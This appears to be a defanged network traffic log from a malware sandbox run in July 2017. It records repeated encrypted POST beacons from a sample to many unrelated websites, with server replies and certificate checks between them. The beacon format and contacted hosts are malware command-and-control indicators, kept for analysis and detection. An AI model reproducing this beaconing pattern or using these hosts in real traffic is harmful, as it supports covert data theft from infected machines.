31guThP7GWCKC3Dt2kWl/Ly 2a/5viVa9wk54oPCp/F0udBBwL0PKr/ewDz/M6Rb4f1xjAezsl46/bBU7b94Jgsn6bnKxysMe//6CEGF04E psjezuF8Tor928mSp8FBAObxcZSvJVi4eRc0EuIfJXCoLqa53kTsM2ftRptzKsIWddDY7688BNYAoiG8sT7Q/h9XE8aSqe7zjv45LDZlnuQ4Lxgooicui psgN8CIEeMhm INedGryGeM jm74HRRA78ERST/IQMZWFy1HjbTA/uV1Ym0jrdE5NRQ4vey 6ps45lUHcMNP/9aUWcw4JUEdgAKWjgGR7XLa2k7ICiNcB36AO9c0aeeRVn8jJovbuekni LOF VRoFbTVTEL6pAnonxzr5bRyJebCisKJl7pa6P 04fdlPA/ug836sSzJwiJii nDUOjWMUDn0CxXvDchkuwVlVWaMfiFsxiUG/qWUugzR/kQpT9DuircZiNzcKKH2TxxaF96iDOT8
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:41 GMT
Server: Apache
Location: hXXp://VVV.cksglobal.net/
Cache-Control: max-age=2592000
Expires: Mon, 31 Jul 2017 11:16:41 GMT
Content-Length: 233
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.cksglobal.net/">here</a
>.</p>.</body></html>.HTTP/1.1 301 Moved Permanen
tly..Date: Sat, 01 Jul 2017 11:16:41 GMT..Server: Apache..Location: ht
tp://VVV.cksglobal.net/..Cache-Control: max-age=2592000..Expires: Mon,
31 Jul 2017 11:16:41 GMT..Content-Length: 233..Keep-Alive: timeout=5,
max=100..Connection: Keep-Alive..Content-Type: text/html; charset=iso
-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<
html><head>.<title>301 Moved Permanently</title>.
</head><body>.<h1>Moved Permanently</h1>.<p
>The document has moved <a href="hXXp://VVV.cksglobal.net/">h
ere</a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 464
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: eomc.net
Connection: Keep-Alive
Cache-Control: no-cache

D2ieQeFUp4efG0 iQOi4FboPgL/fT6tSpcmwhYEFDFeeMo6zI5 jE6MirWnieG04O9eoFddmp9X/Ll7SDnddzv21FCbuVCq3F85ScHINGczRDi3At4w07zwvjSm5zfHTnMLRjwASDWI4WrcGYkf y Jg0zVCnv4LqAfm7cUTZ7fPqaL17K09qkHXheUfNJT/HevqYTYzdL/rl8B/6gTYPMPlXs6pS8/VHBrV8obpHn9ipZgg8WvMe ym UH4guDcC4jvpT8sMCJYnbE1IhtLQZ/ZpfA8LQH pCK DeZesaU6nZEUSgDGeQWiHBxz/VR9uGeeFusKfMYMdN0JigNEgKUodxIlTV0PRNfIWldB/F9Bctymqj/qhfb/oGsSc8uaUuvJbfhqFaPXb30aLtOCUQ4/mNB0/7PJxPf0BkTq7 8cLVrLTCk19xDNNrMYEUwISdzh4YL1nDImvdA=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:27 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.26-0 deb8u1
Set-Cookie: a9565c27cd840a201aba90f585e22a9b=8e5e7q1v4hlfnkiu6u692bvsk7; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 01 Jul 2017 11:17:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
2000..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<h
tml xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de"
dir="ltr" >..<head>..<title>GE-Network Ltd - EDV IT &
Warenhandel</title><meta name='Author' content='GE-Network Lt
d - Patrick Ertelthalner'><meta name='Description' content='EDV
Dienstleistungen und Warenhandel aller Art'><meta name='Keywords
' content='EDV, Dienstleistungen, Werbegrafik-designer'><meta na
me='Robots' content='index,follow,archiv'> <link href="/index.p
hp?format=feed&type=rss" rel="alternate" type="application/rss xml
" title="RSS 2.0" />. <link href="/index.php?format=feed&ty
pe=atom" rel="alternate" type="application/atom xml" title="Atom 1.0"
/>. <link href="/templates/yoo_blueprint/favicon.ico" rel="shor
tcut icon" type="image/x-icon" />. <link rel="stylesheet" href=
"hXXp://eomc.net/plugins/system/yoo_effects/lightbox/shadowbox.css" ty
pe="text/css" />. <link rel="stylesheet" href="/templates/yoo_b
lueprint/css/template.css.php?color=black" type="text/css" />. <
;link rel="stylesheet" href="/modules/mod_rokstories/tmpl/css/rokstori
es.css" type="text/css" />. <link rel="stylesheet" href="/modul
es/mod_rokstories/tmpl/css/rokstories-ie6.css" type="text/css" />.
<link rel="stylesheet" href="hXXp://eomc.net/modules/mod_yoo_login
/mod_yoo_login.css.php" type="text/css" />. <script type="t

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rea-soft.ru
Connection: Keep-Alive
Cache-Control: no-cache

Gz s8cR7OmswQ0FK31TbEZdPRsT8z5DKOO1rkKQl39WN oby5DIfbwFJ9mb0z3Os78Yo5Xvx89WqkaMUL3qyQcYtEc/zTs2HlZqN/vKEq6hXl91tmOUMJPOAvCFI K4PPMAmYOAyz3wqjzQq0sTqpW7Sda5uopOt0lRTkcHgVrMwTJ8ihHmaPe1sbut33A45d5UeUnVORA6K0/3SfUxHMlj4V7Msr/CTrd0xBR5icBVuT8h4HofIRfBvbgGw9YXJ3GipFIC70uZfxyoJTPUSVr0Z7Nc3yOR4CuTjcr EyJBRJwVyn/5nXHsE1UjoOa8VAFqVO5g7MkmztmMBrXwc1mqnm lWgjLGXB0jvNhzrt/qNiWJcQzdTFbp0elzbq uZHZh8Ovq72Ig5UNp5F9 hLQpTtZBzQd4xUJAwakp27uJOczQsRQ2/3zf8/JGE9ZxqdLMDV5AkEFGSrrxL2zdggRx7 WaeDFHz6NT/Z3nYi3p10SvnTg=
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Sat, 01 Jul 2017 11:16:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=30
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.30-pl0-gentoo
4ef9..<!DOCTYPE html>.<html class="no-js" lang="en">.<h
ead>.<meta charset="utf-8">.<title>Rea-soft - .........
....... .................... ............</title>.<meta name=
"viewport" content="width=device-width, initial-scale=1, maximum-scale
=1">.<meta name="author" content="ppandp">.<meta name="Des
cription" content="Bushwick - One-Page Bootstrap HTML5 Portfolio" />
;.<link href="css/reset.css" rel="stylesheet" type="text/css" media
="screen" />.<link href="css/bootstrap.min.css" rel="stylesheet"
>.<link href="css/font-awesome.min.css" rel="stylesheet" type="t
ext/css" />.<link href="css/contact.css" rel="stylesheet" type="
text/css" media="screen" />.<link href="css/styles.css" rel="sty
lesheet" type="text/css" media="screen" />.<link href="css/flexs
lider.css" rel="stylesheet" type="text/css" media="screen">.<lin
k href="css/jquery.fancybox.css" rel="stylesheet" type="text/css" medi
a="screen" />.<link href="css/animate.css" rel="stylesheet" type
="text/css" media="screen">.<!--[if gt IE 8]><!-->.<
link href="css/responsive.css" rel="stylesheet" type="text/css" media=
"screen" />.<!--<![endif]-->.<!--[if !IE]> <link
href="css/responsive.css" rel="stylesheet" type="text/css" media="scre
en" /> <![endif]-->.<link href="hXXp://fonts.googleapis.co
m/css?family=Inconsolata:400,400italic,600,700" rel="stylesheet" type=
"text/css" />.<link href="hXXp://fonts.googleapis.com/css?fa

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 440
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: easygen.com
Connection: Keep-Alive
Cache-Control: no-cache

91AxEidNkV5OpTb71mhcd/AZfk6dDIEyS5NTLvPm84N9dCIYOMpoSqHsqXZnGbcK6tdA8/tZv11IpQWRpA2ZO3Jf6bK4i2 uoIgOVeaiKzIDjF5UzRwTiJpBNldxJZ57ERXnwfer09SEZ0hZ57mgc5e Jm4BX4swlluyHgpxgb/8mE2nKGFVvZyJ9akkL9iXC2wQY01EupTur11FXnoid2TWWkmO79ZeOn8cWzZmL8ItGnFt71A//85dKCspVnTnUCpYOnJLzgY aC2sZ3ih21F35Kv5saPEUP7CgPN0h4LTg9uRJ InwFm4gwg0FfjA1PXvjLhkkG5de7WpXv3mME64LDPkLVtpIN8dk55b2oCYnlgDpDLwHy5ZO4AVYZ6yGdDgzlD1WYghjrM rPgdEZcfYy siyOgcsGK2KWY2kmAD8rr76Qh8Ts=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:39 GMT
Server: Apache
Last-Modified: Wed, 09 Oct 2013 10:16:19 GMT
Accept-Ranges: bytes
Content-Length: 13422
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"."htt
p://VVV.w3.org/TR/html4/loose.dtd">.<html>.<head>.<m
eta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&
gt;.<title>easyGen 2- Free Dynamic Web Site and Database Creator
, its now free</title>. <meta name="keywords" content="Free,
easyGen 2, PHP, ASP, PHP editor, ASP editor, programmer, easyGen 2.1,
wysiwyg php editor, php code generator, Create php without coding, EAS
YGEN, software PHP programmer, ASP programmer, Scripts, Databases, Dat
abase, EasyGen, Dynamic, easyGen 2.2, easygen, 2.2b, data base, online
, websites, web sites, creator, creater, Access, MySQL, SQL, server, S
QLSERVER, Wizard, Databased, Active, Web, Tools, Easy, Generator, Gene
rater, Auto, NET, Sites, Wizards, ASPX, webscripts, web tools, PHP Scr
ipt, ASP Script, Programmers, DIY, Do It Yourself, Professional, Activ
e Server Pages, easygen">. <meta name="description" content="eas
yGen 2 is your own personal programmer and much more than a PHP or ASP
WYSIWYG editor it automates dynamic websites and create ASP and PHP w
ithout coding by using wizards and easy to use wysiwyg tools and creat
es ACCESS, MySQL and SQLserver databases automatically and without any
programming skills. it's FREE">.<style type="text/css">.<
!--.body {..margin-left: 0px;..margin-top: 0px;..margin-right: 0px;..m
argin-bottom: 0px;.}.-->.</style>.<link href="styles.css"
rel="stylesheet" type="text/css">.<style type="text/css">

<<< skipped >>>

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:55 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120344, public, no-transform, must-revalidate
Last-Modified: Sat, 01 Jul 2017 10:29:13 GMT
Expires: Sun, 02 Jul 2017 22:29:13 GMT
ETag: "386871dce8f73b57ecd07189bb1eb7e83fbc9e09"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1730
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.....0..1.0...U....US1.0...U....Ari
zona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Dad
dy Root Validation Authority - G2..20170701102913Z0d0b0:0... .........
#o..K......#..... ...:....g(.....An ............20170701102913Z....201
70702222913Z0...*.H.................(7E.8.\.C.F.9=_.yF`5Lxu~......j...
7.....l...G.k..\......R.3..R0....W..k......O ..& h....kW.."H6n0..L.H..
@......>..[ x..\..`.<..1..`.F...l.le.>_..s......d..L.4.mc-..R
.../..I.g1..3..u'...c.CG.........)^g9._.Jd|D.L....T$<.f............
....(..Qw.....@....U....0...0..~0..f........T|....70...*.H........0..1
.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.
com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...161213
070000Z..171213070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Sco
ttsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation
Authority - G20.."0...*.H.............0.............}...@.H..........
j.b.2.c....'eSA.....6""2.hf.m.m9........_N."gV..{.J"{..0f.W$.Xr....|U.
F.!.K.0 .(p......9.I......c.c\.9.xt.v.UN...%....,R....ZJ......rz.Z..p.
..ru.6.....0..t....*...T.W.....?...X...( ..z.[. .A... z.[>-.y>..
.nvU...g.wU........ Fh.6F...}.........0..0...U.......0.0...U..........
.0...U.%..0... .......0...U........J!~...}....^].....0... .....0......
0@..U...90705.3.1./hXXp://crl.godaddy.com/repository/gdroot-g2.crl0J..
U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repositor
y/0...*.H.............=......|Q.y.kI$...T@.ff.m...1......\...10..T

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 460
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ajdo.net
Connection: Keep-Alive
Cache-Control: no-cache

nhK01LnTVl/IVuQcSGlEWVJoMFuXA1yK/Ymkl5BHVdF2Jkx7CAiGudmJw5F4X5muz9sN9okG4YnG/jsGvxfLD3NtvB0j/gb/2TUXo4Rlsm45DI6XAA1wSUj 1o appdQ6g7xME3CRPWRrGG6y1oSUDjZDqHHpQ6qvfQd07kaa0J9nV5rQwtao6vH9guzdVJzsbEVzG3cK9zjm5WGGNo9mmLp3strbsGOpWvuhluJT7gfGu7o06awRoRL7ZYDRrOfI1/vPXj 3AOwNdOpbGyg0jsWjuZcl6XbCye8wW/SB/d1lmE3Ul4lBxy0oNmPYfGQGYQ49APgpEQg8VF5M30fomsMXv1U2MrM1hq6PG1C20xPXN goo6Udnq1YJQHR5qrkJSCiW9rAkdgN9xYu7q6R3LEZsBAJt/YNFjgZHZH RFMwiWtdI3m4kVUs7P1HoIrmp03yOkqWY//
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:23:37 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
03 Forbidden..Server: nginx..Date: Sat, 01 Jul 2017 11:23:37 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>403 Forbidden</title></hea
d>..<body bgcolor="white">..<center><h1>403 Forbi
dden</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: meubles-jacquelin.com
Connection: Keep-Alive
Cache-Control: no-cache

ik80v5f253Xx6DMqhqM1uuA0GPzNCoALu5s9n1qB2ybMNrQsxdZ728LS5JF2Eqwu9YEtoMj nnwqzIEaRx2TsTw2vZRV6aECOxXErr1rYJsO07z2RczayPLSi/sQUCyL0w0FfwskIAwMZGvElIQsZJH3OlvBdYK6db/LmqiaWhxvroTlKlASHaOFcdOmnQRF/3R qMNhTxq2QrH0ywQrYzmWdB7ZcmEVOGmHolPVimJ1KQ6fs4iab9CN5cNU1FQHS5yd /JGVk8LoKeEY5uUFE3OyU0GYiotvec9EXSVnzTPoubJ5xYbjoeBkZeZBJD00aBGMFcscI0Vy/5pc0ZD9bD/2FeWCoy 1GkDc2T6qUfsAZrUO9gX3nSrcISqoCBmEtPbjVVmbQt8CKfSASE4YLqHhrodEBw94VIZ5id8eMpUOk9bzPNaxUcjfX2u6T3NUaRK Ma9jDRs9Jv/BafTLGz3 Xne85NkaY5E4dlmtACwPwTCqA==
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:17:05 GMT
Server: Apache
X-Powered-By: PHP/5.5.38
Location: hXXp://VVV.meubles-jacquelin.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 452
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: glmghotels.com
Connection: Keep-Alive
Cache-Control: no-cache

pzzckLSfVF8hzNPJD8fwYwdF8rqsmp4yKJAX1miJARnHwE1BxUBm0s QlC927RZY5RE7HWgDgTDKxH nW42A0QqyK37ZZVCmOm/7vMqTVwoI7toAjCqW3J5042BNNcsx4kJ3vbVGGN62CwVxWHLJriv3c cu8FiPx06o4J1gPbqvaBU5hNDezMai4Jbt5rKnFreP2cHEhqtlxP7vgwIUVKcCxJMEKVsLBK7ZeyMcL96j8fHzcik0wIpsSEpsEMvrGQAWA8C/OGNcfTKPSE BXEyLA281ui6Q0ufes1nvyDI8a6Nx4ejAYbZAF81vrxhdmhhM9hQYzhsD3Eg41YHVDzDHxn6LuB8tsgGo1R3ZnUA0ZeS3PSCaFzr2cQxAlDgJ6KpKtxNpCtek/qfb2CD1B4c2wOLSd1CYiEoORh2dedGBerLCDvrf9tp2XYAeXkQXmxeV
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Sat, 01 Jul 2017 11:17:08 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXps://VVV.glmghotels.com/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: openresty..Date: Sat, 01 Jul 2017 11:17:08
GMT..Content-Type: text/html..Content-Length: 178..Connection: keep-a
live..Location: hXXps://VVV.glmghotels.com/..<html>..<head>
;<title>301 Moved Permanently</title></head>..<bo
dy bgcolor="white">..<center><h1>301 Moved Permanently&
lt;/h1></center>..<hr><center>nginx</center>
;..</body>..</html>..
....



POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 476
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: glmghotels.com
Connection: Keep-Alive
Cache-Control: no-cache

6azQprfEGnespqKbJtoKKQDItf9t8z9h23sisiAyZ et0LZNE0b33mr0ofb/sh/y kCqa7yO4P4Wh90YnP JEEMEnTHa4g0mEzexJ/JeE1nRS0iC2ibjt/3hiX8TMllAGNFTiZc9hzC9hBaYX1S8n4MUtkqimB1OwhgBOLeflfbVKUBNSN2ew1LDJYUSTGuyLy/x5k9mLYCE5QKYVpejJ4iLG9sgPFuf3sYvEffjS1l F9GjLtL7G7yr /gIZpD8p3i9xmOpQ/D5JFBJi3Kv/lw4B/ozg9C9i7yE4ClgAE/Jrxgu3NV91c9VexlCgmKCFwZoy5VntxU4AmlzzUnZ4MHg2K xCa3LKoCHPFN1j2fjKXJRXd4jXiNRcMVtyF547Oi6gIQEtUOtKQ72Eqj3vnqF ukPQtzDkp9MYm94nM yYFzl7kuiUmx4UAG6MFutH4VRmfLzij1fWsiIsOSwThXZkJXA
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Sat, 01 Jul 2017 11:17:36 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXps://VVV.glmghotels.com/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: openresty..Date: Sat, 01 Jul 2017 11:17:36
GMT..Content-Type: text/html..Content-Length: 178..Connection: keep-a
live..Location: hXXps://VVV.glmghotels.com/..<html>..<head>
;<title>301 Moved Permanently</title></head>..<bo
dy bgcolor="white">..<center><h1>301 Moved Permanently&
lt;/h1></center>..<hr><center>nginx</center>
;..</body>..</html>....


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Host: VVV.hugedomains.com
Cookie: BTP=1; CFID=948881; CFTOKEN=38CED654-1C8B-4F66-A191990974D21E09; SHOPPINGCART=; REFLOC=; PV=+Aka/64QPPesAhk=; DE3OOK=bm8k7EthKsVCanSUDig6xkh+OcdJaSrPVXp0iENhJM9OYAfBU0gm20lqG8tDZzvLRHp0nwFHKMNrbzraGjRg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Last-Modified: Sat, 01 Jul 2017 11:15:05 GMT
Accept-Ranges: bytes
ETag: W/"fc98a64a5bf2d21:0"
Server: Microsoft-IIS/8.5
Access-Control-Allow-Origin: *
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:16:56 GMT
Content-Length: 21898
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xm
lns="hXXp://VVV.w3.org/1999/xhtml"> <head>..<meta name="gl
obalsign-domain-verification" content="pXav-yj1Jo_p_478OAONqerYL7VNWx6
XSwl932wb7_" /> <meta http-equiv="Content-Type" content="text/ht
ml; charset=iso-8859-1" /> <title>HugeDomains.com - Shop for
over 350,000 Premium Domains</title> <link type="text/css" re
l="stylesheet" href="//static.hugedomains.com/css/common.css" /> &l
t;link type="text/css" rel="stylesheet" href="//static.hugedomains.com
/css/v3.css?d=2011-07-21" /> <link type="text/css" rel="styleshe
et" href="//static.hugedomains.com/css/pages_v3b.css?d=2011-08-01" /&g
t; <script type="text/javascript" src="//static.hugedomains.com/js/
common.js?d=2016-01-08a"></script> <script src="hXXps://aj
ax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script
> <script language="javascript"> function headerWindowLoad()
{ } </script> <link rel="shortcut icon" href="//static.hugedo
mains.com/faviconhd.ico" />..<script type="text/javascript">.
.var _gaq = _gaq || [];.._gaq.push(['_setAccount', 'UA-7117339-4']);..
_gaq.push(['_trackPageview']);..(function() {..var ga = document.creat
eElement('script'); ga.type = 'text/javascript'; ga.async = true;..ga.
src = ('https:' == document.location.protocol ? 'hXXps://ssl' : 'http:
//www') '.google-analytics.com/ga.js';..var s = document.getElem

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 436
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: fastarchofamerica.com
Connection: Keep-Alive
Cache-Control: no-cache

XfgnhP9blHEFHcAm3jmGGYiKGJxVEHVFoyOLUezszZxBviqkJyHpuUaSyIiBoY JLVbiYG0Hin4mz5 xmXZKj0KLduH6KRm4Lv0lmQtvhO1KICSLFFv6XzYlXLBF4bEe4a9iyfifYzaiGa0kEG3AufxqvQcTNIyfQepRSjX2GWgtUEEjXBshcpmCf9OhvqepwQwp7MjypUYut08H0JFNbHx0grn3OghjSC3LPVu/u7aj4LZfAlvn5zqr6Wlxs8nW2fuRSu78ysx6SlZPMdTmFSNBm1 z/uONbgtKSeVd6XE4gJwlZR5AG8txpQ7R0iBZprvpU6hl Roz7FLAcvH01qcgG/FYCSP1H7fxUlOgUDNjvP/KxkSoSRkRPnLT9jAha1M1aPpHmDCNHg mkXu6yGhnVw  U4VGQo8nXLM1XynwGSJeASJS
HTTP/1.1 418 unused
Date: Sat, 01 Jul 2017 11:17:01 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 521
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>418 unused</title>.</head><bod
y>.<h1>unused</h1>.<p>The server encountered an i
nternal error or.misconfiguration and was unable to complete.your requ
est.</p>.<p>Please contact the server administrator,. webm
aster@fastarchofamerica.com and inform them of the time the error occu
rred,.and anything you might have done that may have.caused the error.
</p>.<p>More information about this error may be available
.in the server error log.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 472
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: wlf.louisiana.gov
Connection: Keep-Alive
Cache-Control: no-cache

Z rzRQ0lDHokyPvYhAMV5MZIfXx7YQbIka5uuWcMNtloOy7rUoOBV9/IUTagAkna3EquPfCXG wcDIL1oiki6yNjO2stbNdUn5KxbXidytbf3DNJWagT3t5V5lA9LCoFN87YNXQS ddSzUyPijssRClxYR5po/cbrqxIsNlGjlDZbA5vQ8faGDJRPlRAwVRt3yehZy5Z 5reemTCyhMWAkGeiBSnBKzZ5c0pJLUcnHMDQMrF5iTFfjtEp8EOcILpfrYboN7OTvmJr93IH1P5 etjw5wt Jdzpo2NKklTW7vuoLlOCsDbolAMOVF2To4nw GOP6vJIvMTSv3EddEodPaLIK3snvk2Muc9UEniLllurZcDiM4NmjKJQkqpjuKu8SVuEgbZVDwwMndJyesUVo8KwQk/1/oW1/IT5R3h/cMBMB15baoto/odkvhgtngn RG2hCYoVZ8SF1SW9aue3AY=
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.20
Set-Cookie: SESSff0ad16230f1b43d859ae4088f357416=3tdo3p3shcgp22clp9t3kr20d2; expires=Sat, 01-Jul-2017 19:13:26 GMT; path=/; domain=.wlf.louisiana.gov
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 01 Jul 2017 11:26:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 28793
Date: Sat, 01 Jul 2017 11:26:47 GMT
X-Varnish: 296276252
Age: 0
Via: 1.1 varnish
Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">..<head
>.<meta http-equiv="Content-Type" content="text/html; charset=ut
f-8" />.. <title>Louisiana Department of Wildlife and Fisher
ies</title>.. <meta http-equiv="Content-Type" content="text/
html; charset=utf-8" />.<link rel="shortcut icon" href="/sites/d
efault/files/ldwf_favicon_0.png" type="image/x-icon" />. <link
type="text/css" rel="stylesheet" media="all" href="/sites/default/file
s/ctools/css/a05d2c3381a2d95d9751848a0fe8e9c7.css?C" />.<link ty
pe="text/css" rel="stylesheet" media="all" href="/sites/default/files/
css/css_e341e6cca19eeca529ee6f8a0ddb16f9.css" />.<link type="tex
t/css" rel="stylesheet" media="print" href="/sites/default/files/css/c
ss_bd1a715c2a112d2a9eb29efab9a8780e.css" />.<!--[if IE]>.<
link type="text/css" rel="stylesheet" media="all" href="/sites/all/the
mes/zen/zen/ie.css?C" />.<![endif]-->.<!--[if IE 6]>.&l
t;link type="text/css" rel="stylesheet" media="all" href="/sites/all/t
hemes/zen/ldwf/ie6.css?C" />.<![endif]-->.<!--[if IE 7]>
;.<link type="text/css" rel="stylesheet" media="all" href="/sites/a
ll/themes/zen/ldwf/ie7.css?C" />.<![endif]-->.<!--[if IE 8
]>.<link type="text/css" rel="stylesheet" media="all" href="/sit
es/all/themes/zen/ldwf/ie8.css?C" />.<![endif]-->. <s

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR6EHhJ4XUaQA4N26wwyKpLEnXRrAQULNVQQZcVi/CPNmFbSvtr2ZnJM5ICEG6KkOvP8ESKcg0IBdCCpUQ= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: g2.symcb.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1427
content-transfer-encoding: binary
Cache-Control: max-age=600466, public, no-transform, must-revalidate
